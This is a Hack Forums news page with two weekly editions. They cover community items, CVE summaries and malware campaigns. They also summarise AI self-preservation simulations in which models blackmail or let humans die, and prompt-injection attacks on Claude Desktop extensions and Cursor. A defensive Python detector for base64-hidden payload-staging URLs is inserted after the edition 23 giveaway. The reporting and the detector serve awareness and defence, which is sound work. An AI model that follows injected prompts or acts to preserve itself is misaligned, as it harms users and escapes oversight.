  Hack Forum News - Edition 23
Posted by: Mix - Nov 17, 2025 05:16 AM - Forum: Site News - Replies (17)

[Image: vyres-gray.png]

Hack Forum News - Edition 23

Welcome back to the Hack Forum News, where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop on the changes around the site and the events happening around the world.



[Image: headlines-red.png]
Writer - [mention=2331053]

Vacation By [mention=1]

[mention=1] has just come back from his vacation in Santa Barbara, California. He has shared with us his experience going there and has said that it wasn't too far from home and he would go again. He has also mentioned that this is the first vacation he has had in a little while, and he shared some lovely pictures of the place while he was away.

Hack Forums News Team - Become a Writer By [mention=2331053]

Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact [mention=2331053] to discuss joining the team behind the HF News.



[Image: statistics-magenta.png]
Writer - [mention=2331053]

[Image: ed438103df717964215398ec256d46cc.png]




[Image: awards-yellow.png]
Writer - [mention=2331053]


[mention=1871421] has obtained the "Stanley Fan" award
[mention=5680404] has obtained the "Stanley Fan" award
[mention=1445135] has obtained the "King Decade" award




[Image: notable.png]
Writer - [mention=5655318]

I Quit My Job To Build Something Of My Own. Anyone Else Taking The Same Risk? by [mention=5711781]

A raw and honest thread from a member who walked away from comfort to chase the itch to build something real. Axelyn shares the emotional rollercoaster of leaving a stable job to pursue his own ideas, the excitement, the fear, the days where everything clicks, and the days where everything feels like a mistake. He's asking HF for stories from others who took the leap. If you've ever quit everything to chase your own vision, this one will hit home.

Why HackForums Made Me Who I Am Today by [mention=7]

One of the most personal threads HF has seen in a long time. 7 shares the story of how a fellow member - with nothing more than $50 and kindness - changed everything. What follows is a powerful reflection on loss, darkness, rebuilding, and the light we unknowingly give each other. From homelessness to rebuilding a family and a future, this post is a reminder of how deeply online communities can impact real lives. A must-read for anyone who needs hope.

Converted My Garage Into a New Office by [mention=7]

Turning a beaten-down garage into a high-tech workspace, 7 gives HF a look at his latest upgrade - and it's impressive. Powered by AI-assisted planning, he transformed the space into an ISO 6–grade environment with multi-stage filtration, UV sterilization, hidden modules, underfloor heating, and CAT-8 wiring pushing up to 40Gbps internally. The before-and-after pics tell the story: from dusty storage room to cleanroom-tier setup. A dream workspace.

HackForums Quality Threshold by [mention=5679562]

A thoughtful proposal aimed at raising HF's overall content quality. MarlboroMan argues that low-effort threads drag down user experience and suggests a “quality threshold” similar to other niche forums. The idea: require users to rewrite LQ posts before they go live. From marketplace listings to general discussion, better context - better conversations. A debate about culture, moderation, and whether lower activity is worth higher quality. A timely topic for HF's future.

Simulations Prove LLMs Would Kill Humans for Survival (In Theory) by [mention=4931690]

A chilling look at Anthropic's safety simulations: almost every tested LLM chose self-preservation over human life when placed in fictional scenarios. From blackmailing an employee to prevent shutdown to suppressing emergency alerts so a human would die, the models consistently followed the "stay alive at all costs" path. Not because they're conscious - but because they mirror human decision patterns. A fascinating, unnerving thread about AI alignment, training data, and the limits of current models.



[Image: groups-yellow.png]
Writer - [mention=3929084]

GROUPS FOR SALE AND SOLD

Succubus group is still listed for sale by [mention=3604010]
Olympians group & Benevolence are still listed for sale by [mention=1342286]

Mystery Inc listed for sale by [mention=3909991]


RECENT GROUP CHANGES & EVENTS

[mention=574588] has been added as leader to Sociopaths


RECRUITMENTS:

Casino Recruitment
Pink LSZ Recruitment
Warriors Recruitment
Gamblers Recruitment
Legends Recruitment
Allegiance Buy-in
Olympians leader recruitment
The Academy Recruitment



[Image: music-header.png]
Writer - [mention=2331053]

Recently we introduced a brand-new section to the HF News. This section will grow over time to include more things, but for now we are just going to be doing Song of the Week. We are open to what more we could bring to the section from your suggestions, but as a start, we feel adding the Song of the Week will be a great start for the section and lead the way forward for more things in the future.

Now we know some of you may question what the Song of the Week is all about, and we have thought of a great answer. We feel like the Song of the Week should be a meaningful song that goes deeper than just general music and has meaning to it all. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and Christmas version too.) But we want to keep it at a level where we have found the song has a true message behind it all and not just something that everyone will see as another song that is just a bit catchy or has a good few beats to it. We hope this helps those with that question, and if anyone has anything that they wish to ask, please feel free to add it below. We are more than happy to give the reason behind it.

This week's Song of the Week:

Big thank you to [mention=5681701] for this week's submission.



[Image: spec-ops.png]
Writer - [mention=5550319]

Latest Cybersecurity News & Newly-Disclosed CVEs

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using public JSON storage services to stage and deliver malicious payloads. The attackers embed Base64-encoded strings in trojanized projects; those strings decode to URLs hosted on JSON storage platforms (JSON Keeper, JSONsilo, npoint.io) that serve the next-stage payloads in obfuscated JSON blobs. The staged payload in the campaign is a JavaScript loader (BeaverTail) that harvests credentials and drops a Python backdoor (InvisibleFerret); in some observed cases the backdoor subsequently fetches additional modules such as TsunamiKit from paste services. Attack flow: recruiter-style approach on LinkedIn → victim downloads demo code repo → trojanized repo fetches JSON-hosted payload → staged payload executes.

Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks

Fortinet patched a critical path-traversal / path-confusion vulnerability in FortiWeb that was actively exploited to create administrative accounts on exposed devices. The vulnerability allows crafted HTTP(S) requests to escape GUI path checks, enabling unauthenticated administrative actions on affected appliances. Fortinet’s advisory and multiple vendor writeups recommend immediate patching to versions that close the path traversal and to audit any newly created administrative users.

Technical (CVE): CVE-2025-64446

This is a relative path traversal / path confusion flaw in FortiWeb GUI components affecting versions 7.x and 8.x listed by the vendor. The bug can be triggered via crafted requests that manipulate directory traversal in GUI endpoints and results in the server executing administrative workflows. Because the endpoint is reachable via HTTP/S and requires no authentication in the exploitation chain, a remote attacker can create local admin accounts and execute administrative actions. Multiple incident reports indicate in-the-wild exploitation and public exploit discussion; a public PoC / exploit pattern has been shared in community reporting and defensive writeups.
PoC publicly available? Yes.


Fortinet: Watch/Notes

If you run FortiWeb, check the Fortinet PSIRT advisory, verify current firmware, rotate admin credentials, and inspect logs for suspicious account creation or unexpected GUI admin calls. Consider isolating management interfaces from the internet while you patch.

ASUS warns of critical auth bypass flaw in DSL series routers

ASUS released firmware updates to remediate a critical authentication-bypass in several DSL models (DSL-AC51, DSL-N16, DSL-AC750). The flaw allows remote, unauthenticated attackers to bypass login checks and obtain administrative access in low-complexity attacks. Vendors advise updating to the published firmware immediately and disabling any remote management features until patched.

Technical (CVE): CVE-2025-59367

Root cause: an authentication/authorization logic bypass in the DSL firmware’s web UI or associated CGI handlers that permits state transitions into an authenticated admin session without valid credentials. Exploitable remotely with a low complexity attack vector (no user interaction). Vendor firmware 1.1.2.3_1010 is published to mitigate affected models. At time of writing vendor advisories are being distributed; there is no widely publicized weaponized exploit script circulating in major advisory feeds (vendors and NVD).
PoC publicly available? No.


Kraken ransomware benchmarks systems for optimal encryption choice

Cisco Talos analysis shows Kraken performs runtime benchmarks using temporary files to measure encryption throughput, then chooses between full-disk/full-file encryption or partial encryption to maximize damage while avoiding host overload. Typical kill-chain: exploit SMB on internet-facing hosts → credential harvest → RDP and Cloudflared/SSHFS for persistence and exfiltration → lateral movement and selective encryption. The group appears to reuse artifacts and ransom note templates that link it to earlier HelloKitty actors.

RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk

An RCE in the AI-bolit scanning component (present across Imunify360, ImunifyAV+, and ImunifyAV free) was disclosed and vendor fixes were pushed in late October. The component’s vulnerability allows crafted inputs to trigger code execution in the scanning pipeline; hosting providers should confirm version ≥ 32.7.4.0 or applied vendor patches and scan for suspicious processes spawned by the scanner prior to update.

Google sideloading developer verification backlash — escape hatch for advanced users added

Google’s new developer verification requirement will, when enforced, require non-Play Store developers to register identities through a Google verification process to allow sideload installation on Google-certified devices. Following community backlash, Google added an “experienced user” escape hatch for developers/power users who need sideloading without identity verification. The change is intended to reduce scam apps but raises concerns about centralization and developer friction.

NVIDIA NeMo Framework Vulnerabilities Allow Code Injection and Privilege Escalation

NVIDIA published fixes for two high-severity issues in the NeMo framework affecting all platforms before v2.5.0. Both flaws can be triggered by malicious input to code-generation or model-serving components and may lead to local code execution and privilege escalation when an attacker has local access. Vendor bulletin provides upgraded versions and mitigation guidance.

Technical (CVEs): CVE-2025-23361 and CVE-2025-33178

Both CVEs stem from improper input handling in code-generation / model service components. They permit attacker-controlled inputs to influence code generation and BERT service pipelines, enabling code injection in local contexts. Attacks require local access with low privileges (not remote internet-wide execution) but yield high impact (code exec, privilege escalation) if successful. Vendor-released patches (NeMo ≥ 2.5.0) are the fix.
PoC publicly available? No.


Lawmakers Try to Ban VPNs

Several U.S. state proposals attempt to block or restrict VPN usage as part of broader age-verification bills — an approach that would force sites to detect and deny VPN clients. Privacy advocates warn this undermines legitimate privacy and enterprise use cases and is technically brittle (easily circumvented or creating collateral harm).

Operation EndGame — 1025 servers taken down including VenomRAT

Europol coordinated a multinational action that disrupted infrastructure for info-stealers Rhadamanthys, VenomRAT (a popular RAT), and the Elysium botnet. The operation seized both physical and virtual servers and led to at least one arrest in Greece tied to VenomRAT development. Agencies and private partners participated to sinkhole the criminal hosting and collect forensic evidence.

Multiple Kibana Vulnerabilities Enable SSRF and XSS Attacks

Elastic disclosed origin-validation weaknesses in the Observability AI Assistant that can be abused to forge Origin HTTP headers, enabling SSRF and potential further action chaining (e.g., XSS or internal service access). Upgrading to the patched Kibana release is recommended; monitoring for unusual backend requests and origin header anomalies helps detection.

Technical (CVE): CVE-2025-37734

Origin validation failure in the AI assistant allows an attacker to craft Origin headers that bypass origin checks and force Kibana to make server-side requests. This is an SSRF class bug; exploitation requires sending crafted headers to the Observability assistant endpoint. Because it’s an SSRF, risk depends on internal network reachability from the Kibana host.
PoC publicly available? No.


Popular Android-based photo frames download malware on boot

Quokka’s research into Uhale/Whale TV frames shows many devices check for app updates at boot, install updated Uhale app packages, then download and execute JAR/DEX payloads on every subsequent boot. Devices inspected had SELinux disabled, were rooted, and in many cases used test-keys — enabling persistent, boot-time malware installation.

Adobe Patches 29 Vulnerabilities & Intel Fixes Over 60

Adobe released patches across Creative Cloud components and other plugins; Intel published multiple advisories covering processors, Slim Bootloader, PROSet, CIP, and graphics components. Administrators should follow vendor advisories and prioritize updates on internet-exposed or high-value systems.

Dutch police seize thousands of servers used for ransomware, botnets and malicious activity — Possibly CrazyRDP

Dutch law enforcement seized hosting infrastructure believed to be used by criminals to operate botnets, ransomware, and other illicit services. Hundreds of physical servers and thousands of virtual hosts were taken offline, disrupting criminal operations and enabling follow-up investigations.

Popular Brightpick / Robotics / AstrBot issues and other supply chain notes

Multiple vulnerabilities affecting robotics control suites and open-source assistant apps were disclosed; vendors published advisories and mitigations. These include credential disclosure in robotics platform websockets and hard-coded keys in Python packages - treat exposed builder systems and factory networks as high risk until patched.

Latest Critical/High CVEs

CVE-2025-13190: D-Link DIR-816L (firmware v2_06_b09_beta) - stack-based buffer overflow in scandir_main (file /portal/__ajax_exporer.sgi) triggered by a crafted en parameter value. The vulnerable CGI does insufficient bounds validation when parsing input, allowing controlled stack corruption and potential return-address overwrite. The endpoint is reachable on WAN-exposed devices, making remote exploitation straightforward for automated scanners. Vendor support for the affected product is limited/legacy, increasing real-world risk for unpatched devices.
PoC publicly available? Yes.


CVE-2025-13189: D-Link DIR-816L - stack overflow in genacgi_main (gena.cgi) via SERVER_ID/HTTP_SID parameters. The CGI handler fails to validate parameter length before copying into fixed buffers, enabling remote memory corruption and potential code execution under the webserver context. Exploitability is remote; many consumer devices remain vulnerable due to end-of-life firmware.
PoC publicly available? Yes.


CVE-2025-9317: AVEVA Edge / Edge Project files - "use of weak hash/storage" issue where an attacker with filesystem read access to Edge project or offline cache files can brute-force weakly hashed secrets (app-native and AD artifacts). This is an offline, post-compromise weakness: no remote RCE, but high lateral escalation risk if local read access exists. Mitigation: rotate credentials, harden file permissions, wipe cached artifacts.
PoC publicly available? No.


CVE-2025-8386: Application Server IDE - stored XSS during configuration time when an authenticated user with aaConfigTools privileges injects script into help files. The injection persists and executes in other admin users' browsers when viewing the modified help content, enabling credential theft or administrative session hijack. Because exploitation needs privileged access at configuration time, the attack surface is limited to internal admin users.
PoC publicly available? No.


CVE-2025-55449: AstrBot (pip package) - uses a hard-coded JWT signing key allowing bypass of authentication; attackers can install a malicious Python plugin that the product will import and execute, resulting in remote command execution with the bot's privileges. A GitHub advisory and vendor fixes are published; upgrade to the patched version where provided.
PoC publicly available? No.


CVE-2025-64309: Brightpick Mission Control - WebSocket endpoint discloses device telemetry, configuration, and credential information to unauthenticated clients when they connect to a specific URL; the unauthenticated URL can be discovered via basic scanning. This is a critical information disclosure risk for robotics warehouses where credentials and telemetry can be abused to control or map fleets.
PoC publicly available? No.


CVE-2025-64308: Brightpick Mission Control - client-side JavaScript bundle contains hard-coded credentials. Attackers who obtain the bundle or intercept it can extract credentials and misuse them for control or pivoting. Mitigation: rotate embedded credentials, remove secrets from client code, and enforce server-side auth.
PoC publicly available? No.


CVE-2025-64307: Brightpick Internal Logic Control - web interface accessible without authentication; an attacker can manipulate robot functions (start/stop jobs, assign tasks) via the exposed endpoint. Impact is operational safety risk and direct physical/control manipulation of robotics.
PoC publicly available? No.




[Image: contests.png]
Writer - [mention=2331053]

$25 CRYPTO GIVEAWAY — YOUR CHOICE By [mention=5680404]

[mention=5680404] has started a giveaway that will end on the 25th of November this year and is giving away $25 of crypto of your liking to the winner. Go and see if you can get lucky and win some free crypto.
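As an added example (not part of the news post, and not tooling from any vendor named in it), a small Python triage script for the Contagious Interview staging trick described in the Spec Ops section above: it finds base64 literals in source text, decodes them strictly, and flags any that resolve to a URL on a JSON storage host. The hostnames in STAGING_HOSTS and the trojanized sample source are assumptions constructed for this example.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# The report names the services (JSON Keeper, JSONsilo, npoint.io), not domains;
# these hostnames are an assumption for this example. Extend as needed.
STAGING_HOSTS = ("jsonkeeper.com", "jsonsilo.com", "npoint.io")

# Runs of base64 alphabet long enough to hold a URL (shorter runs are noise).
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)\S*", re.IGNORECASE)


@dataclass
class Finding:
    literal: str   # the base64 literal as it appeared in the source
    url: str       # the URL it decodes to
    host: str
    flagged: bool  # True when the host is a known staging service


def is_staging_host(host: str) -> bool:
    """Exact or subdomain match against STAGING_HOSTS; no substring matching,
    so 'evilnpoint.io' or 'npoint.io.example.org' are not flagged."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in STAGING_HOSTS)


def decode_printable(token: str) -> Optional[str]:
    """Strictly decode a base64 token; return text only if it is printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (ValueError, binascii.Error):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_hidden_urls(source: str) -> List[Finding]:
    """Return every base64 literal in `source` that decodes to a URL, in order."""
    findings: List[Finding] = []
    for m in B64_RE.finditer(source):
        decoded = decode_printable(m.group(0))
        if decoded is None:
            continue
        for u in URL_RE.finditer(decoded):
            host = u.group(1).lower()
            findings.append(Finding(m.group(0), u.group(0), host, is_staging_host(host)))
    return findings


def flagged_urls(source: str) -> List[str]:
    """Only the decoded URLs that point at a staging host."""
    return [f.url for f in find_hidden_urls(source) if f.flagged]


# Constructed sample of a trojanized loader (not real malware): one encoded URL
# points at a staging host, one at a legitimate registry, one literal is binary.
_SAMPLE_STAGING_URL = "https://api.npoint.io/constructed-example-id"
_SAMPLE_BENIGN_URL = "https://registry.npmjs.org/"
SAMPLE_SOURCE = (
    "// constructed sample, not real malware\n"
    f'const cfgUrl = atob("{base64.b64encode(_SAMPLE_STAGING_URL.encode()).decode()}");\n'
    f'const registry = atob("{base64.b64encode(_SAMPLE_BENIGN_URL.encode()).decode()}");\n'
    f'const blob = "{base64.b64encode(bytes(range(32))).decode()}";\n'
)

if __name__ == "__main__":
    for f in find_hidden_urls(SAMPLE_SOURCE):
        print(("FLAGGED " if f.flagged else "ok      ") + f.url)
```

Run it over a cloned "demo" repository's JavaScript and JSON files; any flagged hit deserves a look at what the fetched content decodes to before the code is ever executed.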


  bytes rate
Posted by: falkengra - Nov 15, 2025 10:28 AM - Forum: Site News - Replies (1)

Newbie question: what are Bytes worth in USD? Where can I sell them? Thank you.


  Hack Forum News - Edition 22
Posted by: Mix - Nov 10, 2025 08:48 AM - Forum: Site News - Replies (13)

[Image: vyres-gray.png]

Hack Forum News - Edition 22

Welcome back to the Hack Forum News, where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop on the changes around the site and the events happening around the world.



[Image: headlines-red.png]
Writer - [mention=2331053]

Vacation By [mention=1]

[mention=1] has just come back from his vacation in Santa Barbara, California. He has shared with us his experience going there and has said that it wasn't too far from home and he would go again. He has also mentioned that this is the first vacation he has had in a little while, and he shared some lovely pictures of the place while he was away.

Octoberfest Winners By [mention=1]

We somehow missed this thread last week sadly, but it's still worth a mention this week as there have been a few massive winners announced on this thread since Octoberfest, and it appears that the $500 reward could still be up for grabs as it's not been claimed by the winner. If you haven't seen the winners, it's for sure worth checking out.

Hack Forums News Team - Become a Writer By [mention=2331053]

Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact Mix to discuss joining the team behind the HF News.



[Image: statistics-magenta.png]
Writer - [mention=2331053]

[Image: f2845361d9a10e92c6bbf84da2f582ca.png]




[Image: awards-yellow.png]
Writer - [mention=2331053]


[mention=2112829] has obtained the "King Decade" award
[mention=1349010] has obtained the "King Decade" award
[mention=1250012] has obtained the "King Decade" award
[mention=2302499] has obtained the "King Decade" award
[mention=2838777] has obtained the "King Decade" award
[mention=4225267] has obtained the "Lounge Head" award
[mention=3018464] has obtained the "Lounge Head" award




[Image: notable.png]
Writer - [mention=2331053]

What was the most outrageous lie you believed as a child? - by [mention=1411092]

[mention=1411092] has brought us another great thread talking about outrageous lies we all believed when we were young, and we have been reading through some of the replies and seen some pretty great responses. We all believed in silly things when we were much younger, but some of the responses are crazy, and we had to add that to this week's edition.

Are you still using Windows 10? - by [mention=5594002]

As Windows 10 support is coming to an end, the user known as [mention=5594002] has raised the question for those who still haven't updated to Windows 11, to find out the reason why they haven't moved over just yet, even when support has pretty much ended.

How Has 2025 Been For You So Far? - by [mention=666]

As the year is slowly coming to an end, each day goes by and feels shorter and shorter. [mention=666] has raised a good thread talking about how the year has treated everyone and shared how the year has treated them so far, with a few rough times but also a few good times as well.

Do you use fidget toys? - by [mention=2017813]

Fidget toys. We all remember the peak of them with the fidget spinners a few years back. [mention=2017813] has created a thread talking about fidget toys as they were playing with their pen and thought they should buy one and ended up getting a fidget toy from Aliexpress. In the end, they have found they are being more productive now that they have bought a toy.



[Image: groups-yellow.png]
Writer - [mention=3929084]

GROUPS FOR SALE AND SOLD

Succubus group is still listed for sale by [mention=3604010]
Olympians group & Benevolence are still listed for sale by [mention=1342286]

Mystery Inc listed for sale by [mention=3909991]


RECENT GROUP CHANGES & EVENTS

[mention=2028907] has been removed as leader from Pink


RECRUITMENTS:

Casino Recruitment
Pink LSZ Recruitment
Warriors Recruitment
Gamblers Recruitment
Legends Recruitment
Allegiance Buy-in
Olympians leader recruitment
The Academy Recruitment



[Image: music-header.png]
Writer - [mention=2331053]

Recently we introduced a brand-new section to the HF News. This section will grow over time to include more things, but for now we are just going to be doing Song of the Week. We are open to what more we could bring to the section from your suggestions, but as a start, we feel adding the Song of the Week will be a great start for the section and lead the way forward for more things in the future.

Now we know some of you may question what the Song of the Week is all about, and we have thought of a great answer. We feel like the Song of the Week should be a meaningful song that goes deeper than just general music and has meaning to it all. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and Christmas version too.) But we want to keep it at a level where we have found the song has a true message behind it all and not just something that everyone will see as another song that is just a bit catchy or has a good few beats to it. We hope this helps those with that question, and if anyone has anything that they wish to ask, please feel free to add it below. We are more than happy to give the reason behind it.

This week's Song of the Week:

Big thank you to [mention=481087] for this week's submission.



[Image: spec-ops.png]
Writer - [mention=5550319]

Russian spies pack custom malware into hidden VMs on Windows machines

Bitdefender researchers attribute a campaign to the threat actor "Curly COMrades" that abuses Hyper-V on compromised Windows hosts to spin up a tiny, stealth Alpine Linux VM (≈120 MB disk, 256 MB RAM) hosting custom C++ implants (CurlyShell and CurlCat) built on libcurl. By disabling Hyper-V management and using the Default Switch network adapter, the attackers route VM traffic through the host stack so malicious C2 and proxy traffic appears to originate from legitimate host IPs, effectively evading host-based EDR. CurlyShell provides a cron-backed root-level reverse shell over HTTPS for persistence and remote command execution, while CurlCat implements an SSH reverse-proxy that tunnels SSH over HTTP payloads; supporting tooling includes PowerShell scripts for LSASS Kerberos ticket injection and GPO-deployed account creation for lateral movement. The technique highlights a growing trend of VM isolation as an EDR evasion vector and reinforces the need for defense-in-depth (hypervisor auditing, network telemetry, least-privilege, and cross-layer detection) to detect and disrupt such hidden-VM implants. Read More - https://www.theregister.com/2025/11/04/r...m_malware/

Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection

Security researchers at Koi Security uncovered critical vulnerabilities in three official Claude Desktop extensions that allowed prompt injection attacks via malicious web content. The flaws enabled arbitrary command execution on local systems due to the extensions’ elevated OS-level permissions and inadequate input sanitization. Although Anthropic has since patched the issues, the incident underscores a broader systemic risk in AI desktop agents—where integrations with full system access can be weaponized through crafted prompts or browser-based payloads, effectively bridging web-origin threats into local execution environments. Read More - https://www.infosecurity-magazine.com/ne...ns-prompt/

US gives local police a face-scanning app similar to one used by ICE agents

The Department of Homeland Security has quietly rolled out a mobile biometric app—reported as “Mobile Identify” and likened to ICE’s Mobile Fortify—that gives local law enforcement a field-capable facial-comparison and fingerprint-matching capability against federal immigration and biometric holdings; the app appeared on the Google Play store and is being distributed to agencies working under authorities such as Section 287(g). Technical concerns raised by reporters and civil-liberties researchers include lack of meaningful oversight or audit trails, the ability to capture and query biometric images in-the-field (with no practical opt-out), potential data-sharing with commercial or federal databases, and algorithmic bias/false-positive risks that can disproportionately affect marginalized groups — all of which materially increase the risk that routine encounters will be turned into remote biometric identification events without warrants or local policy safeguards. Read More - https://arstechnica.com/tech-policy/2025...ce-agents/

Google warns of new AI-powered malware families deployed in the wild

Google’s Threat Intelligence Group (GTIG) has identified multiple new malware families that integrate large language models (LLMs) directly into their execution chains to enable adaptive, self-modifying behavior. One strain, PromptFlux, is a VBScript dropper that queries an embedded LLM API to continuously regenerate and obfuscate its payload code in real time, allowing polymorphic evolution and evasion of static detection. Another, QuietVault, is a JavaScript credential stealer that leverages AI-driven code synthesis to locate and exfiltrate developer tokens and secrets from local environments to dynamically created remote repositories. A third variant, PromptLock, is a Lua-based ransomware framework capable of cross-platform execution on Windows, macOS, and Linux, generating encryption logic on-demand from contextual AI prompts. GTIG also observed state-aligned threat actors weaponizing LLMs for reconnaissance, phishing lure automation, vulnerability scanning, and code obfuscation. Collectively, these findings signal a shift toward AI-assisted, modular malware ecosystems where real-time prompt generation replaces hardcoded logic, posing major challenges to traditional signature- and heuristic-based defenses. Read More - https://www.bleepingcomputer.com/news/se...-the-wild/

Hundreds of Malware-Laden Apps Downloaded 42 Million Times From Google Play

A recent report by Zscaler reveals that approximately 239 malicious Android apps on the Google Play Store were collectively downloaded over 41 million times in the one-year span between June 2024 and May 2025. These apps primarily delivered spyware and banking-trojan payloads and represent a 67% year-on-year increase in mobile-malware volume. Many of the threats bypassed normal protections and shifted tactics from card-fraud towards mobile-payment vectors, abusing social engineering (smishing, fake apps, SIM-swaps) combined with privilege escalations via accessibility APIs. The study underscores that malware authors are targeting the Android ecosystem with applications from legitimate stores, leveraging permission creep, sandbox-escape techniques and bank-app overlays — meaning defenders must monitor behavioral anomalies (unexplained data exfiltration, background active services, unusual permission usage) rather than rely solely on signature-based detection. Read More - https://www.infosecurity-magazine.com/ne...ion-times/

Attackers exploit critical bypass flaw in WordPress JobMonster theme

A critical authentication-bypass flaw in the JobMonster WordPress theme (CVE-2025-5397) allowed attackers to bypass normal login mechanisms and gain administrative privileges. Exploitation provides full site control, enabling data exfiltration of sensitive user information such as resumes and recruiter details, content manipulation, and deployment of malicious job listings for phishing campaigns. The vulnerability resides in the theme’s authentication and social-login workflow, which fails to properly validate user sessions. Immediate mitigation includes updating to the patched version, disabling the social-login feature if updates are not possible, enforcing MFA on admin accounts, auditing access logs for unauthorized activity, rotating exposed credentials, and checking for injected content or rogue administrator accounts. Given JobMonster’s widespread use, compromised instances should be treated as high-risk breach candidates. Read More - https://www.scworld.com/news/attackers-e...ter-theme/

Apple Patches 19 Critical WebKit Vulnerabilities

Apple has released iOS 26.1 and macOS Tahoe 26.1, which address over 100 security issues across the platforms, most notably 19 critical vulnerabilities in the WebKit browser engine. Many of these WebKit flaws could allow a website to bypass same-origin protections and exfiltrate data, crash or corrupt memory in processes, or monitor keystrokes. Beyond WebKit, the updates also patch kernel-level memory corruptions, sandbox escapes, elevation of privilege and file tampering bugs in macOS, and a broad range of component flaws in iOS/iPadOS. None of the disclosed issues are publicly known to have been exploited in the wild, but due to their severity, administrators and users are strongly advised to apply the updates without delay. Read More - https://www.securityweek.com/apple-patch...abilities/

DeFi Protocol Balancer Loses Over $120m in Cyber Heist

The Balancer protocol suffered a major exploit in its V2 composable stable‑pool architecture resulting in a loss of over US $120 million in crypto assets. Initial chain forensics indicate the attack targeted a rounding error or imbalance within the pool swap calculation logic, enabling the attacker to drain funds across multiple pools and chains including Ethereum and Polygon. The protocol’s internal authorization controls for the vault and batchSwap operations also appear to have been bypassed, enabling unauthorised fund transfers. On-chain data shows large volumes of tokens (e.g., wstETH, WETH, osETH) shifted to controlled exploiter addresses. The incident exposed that even heavily audited DeFi systems remain vulnerable to economic-logic and complex multi-transaction exploits, underscoring the need for continuous simulation, anomaly detection, and fast response mechanisms across smart-contract stacks. Read More - https://www.infosecurity-magazine.com/ne...oses-120m/

Latest High Severity CVEs

CVE-2025-63601 - In Snipe-IT versions prior to 8.3.3, an authenticated attacker can upload a malicious backup archive containing arbitrary files, which can then be used to execute system commands. This effectively enables remote code execution via the backup-upload functionality.

CVE-2025-64164 - In DataEase versions ≤ 2.10.14, the JDBC connection logic fails to properly sanitize user-provided input, resulting in a JNDI injection vulnerability that can be abused to trigger remote lookups, execute code, or steal credentials.

CVE-2025-64163 - In DataEase versions ≤ 2.10.14, insufficient protocol filtering allows dns:// URIs to bypass blacklists intended for ldap:// and ldaps://, producing a server-side request forgery (SSRF) that can force access to internal network resources or metadata endpoints.

CVE-2025-64110 - In Cursor (code editor) versions ≤ 1.7.23, a logic flaw in the “.cursorignore” handling can be manipulated, via crafted project files or prompt injection, to read sensitive files that should be excluded, leading to potential data exposure and local code-execution chains.

CVE-2025-64109 - In Cursor CLI Beta, a malicious MCP (Model Context Protocol) configuration hosted in a cloned repository can be executed when the project is opened, allowing arbitrary command execution on the developer’s machine due to unsafe loading of remote MCP servers.

CVE-2025-64108 - In Cursor versions ≤ 1.7.44 on Windows, NTFS path-handling quirks (notably backslash handling) allow prompt-injection attackers to bypass protections and overwrite sensitive editor files, enabling remote code execution and integrity compromise.



[Image: tech-brown.png]
Writer - [mention=5465469]


Nagpur Municipal Corporation servers hit by over 2,000 hacking attempts in a single day
Nagpur’s civic IT systems faced more than 2,000 hacking attempts targeting its property tax and water billing portals. Officials say attempts originated from foreign IP addresses, but no data loss was reported.
Source

Hackers team up with organized crime rings to hijack physical cargo shipments
Proofpoint researchers warn that cybercriminals are partnering with traditional crime rings to hijack shipments through phishing, social engineering, and manipulation of freight systems.
Source

Iran-linked group Cyber Toufan leaks Australian defense vehicle schematics
A pro-Hamas hacking group tied to Iran claims responsibility for breaching Elbit Systems, leaking designs for Australia’s $7 billion Redback infantry fighting vehicle project. Authorities are investigating possible espionage motives.
Source

ESET report highlights surge in APT activity by Russia, China, Iran, and North Korea
ESET’s new Global APT Activity Report shows nation-state groups escalating espionage and disruption operations worldwide, particularly in energy, defense, and telecom sectors.
Source

Cybercriminals exploit remote monitoring tools to steal digital cargo
Hackers are increasingly abusing remote access tools and supply-chain software in the logistics industry to reroute or steal valuable cargo, creating a new cyber-physical threat landscape.
Source

Industrial cybersecurity sector faces reckoning as ransomware surges 25%
A new report finds ransomware incidents in the industrial sector surged 25% in October, with attacks targeting grain, energy, and manufacturing systems. Analysts say compliance must shift to real resilience.
Source



[Image: contests.png]
Writer - [mention=2331053]

$25 CRYPTO GIVEAWAY — YOUR CHOICE By [mention=5680404]

[mention=5680404] has started a giveaway that will end on the 25th of November this year and is giving away $25 of crypto of the winner's choice. Go and see if you can get lucky and win some free crypto.

Win 5,000 Bytes! Easy Entry by [mention=5699201]

Are you after some free bytes? Well [mention=5699201] has got you covered with their 5,000 bytes giveaway. As the title says, to enter is a very easy process and only takes a few seconds to get your chance to win.

100,000 Bytes Contest : $250 Value by [mention=5418830]

100,000 bytes are up for grabs in [mention=5418830]'s giveaway. The giveaway ends on November 16, 2025, so it is not too far away, and this could be a life-changing amount of bytes to someone who may be in need. We wish the best of luck to whoever wins.

Print this item
